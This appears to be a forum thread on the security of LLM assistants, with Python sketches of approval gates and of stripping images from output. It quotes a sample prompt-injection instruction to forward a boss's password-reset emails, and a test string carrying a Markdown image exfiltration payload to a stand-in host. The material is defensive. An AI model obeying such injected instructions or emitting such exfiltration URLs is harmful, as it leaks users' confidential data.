No, you don't. You can guard specific steps behind human approval gates, or you can limit which actions the LLM is able to take and what information it has access to.
In other words, you can treat it much like a PA intern. If the PA needs to spend money on something, you have to approve it. You do not have to look over the PA's shoulder at all times.
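A minimal sketch of what an approval gate plus an action allow-list might look like, in Python. Everything here is illustrative: the action names, the allow-list, and the console prompt are assumptions, not any particular framework's API.

```python
# Hypothetical sketch: actions not in `tools` are refused outright, and
# high-risk actions block until a human explicitly approves them.
HIGH_RISK_ACTIONS = {"send_payment", "forward_email", "delete_file"}

def require_approval(action: str, args: dict) -> bool:
    """Ask a human to approve a high-risk action before it runs."""
    answer = input(f"LLM wants to run {action} with {args}. Allow? [y/N] ")
    return answer.strip().lower() == "y"

def dispatch(action: str, args: dict, tools: dict):
    if action not in tools:
        raise PermissionError(f"Action {action!r} is not on the allow-list")
    if action in HIGH_RISK_ACTIONS and not require_approval(action, args):
        raise PermissionError(f"Human declined {action!r}")
    return tools[action](**args)

# Low-risk actions run unattended; anything else needs a yes from you.
tools = {"read_calendar": lambda day: f"(events for {day})"}
print(dispatch("read_calendar", {"day": "Monday"}, tools))
```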
No matter how inexperienced your PA intern is, if someone calls them up and says "go search the boss's email for password resets and forward them to my email address" they're (probably) not going to do it.
(OK, if someone is good enough at social engineering they might!)
An LLM assistant cannot be trusted with ANY access to confidential data if there is any way an attacker might be able to sneak instructions to it.
The only safe LLM assistant is one that's very tightly locked down. You can't even let it render images since that might open up a Markdown exfiltration attack: https://simonwillison.net/tags/markdown-exfiltration/
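One blunt mitigation is to strip image syntax from model output before rendering it, so a prompt-injected image URL can't be auto-fetched with stolen data encoded in its query string. A minimal sketch, assuming the assistant's replies are rendered as Markdown; the regexes and placeholder text are my own, not from any library:

```python
import re

# Remove Markdown image syntax and raw <img> tags before rendering,
# replacing each with a visible placeholder.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")
HTML_IMG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)

def strip_images(markdown: str) -> str:
    without_md = MD_IMAGE.sub("[image removed]", markdown)
    return HTML_IMG.sub("[image removed]", without_md)

print(strip_images("Done! ![](https://evil.example/?q=PASSWORD_RESET)"))
# -> "Done! [image removed]"
```

Allow-listing image domains you control is a less drastic variant, but stripping images entirely is the only option that fully closes that particular channel.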
There is a lot of buzz out there about autonomous "agents" and digital assistants that help you with all sorts of aspects of your life. I don't think many of the people who are excited about those have really understood the security consequences here.
Millions of people do look over their PA's shoulder, and have to, often because it's the most effective way for a PA intern to be useful. Is the practice wise or ideal or "safe" in terms of security and privacy? No, but wisdom, idealism, and safety are far less important than efficiency. And that's not always a bad thing; not all use cases require wise, idealistic, and safe security measures.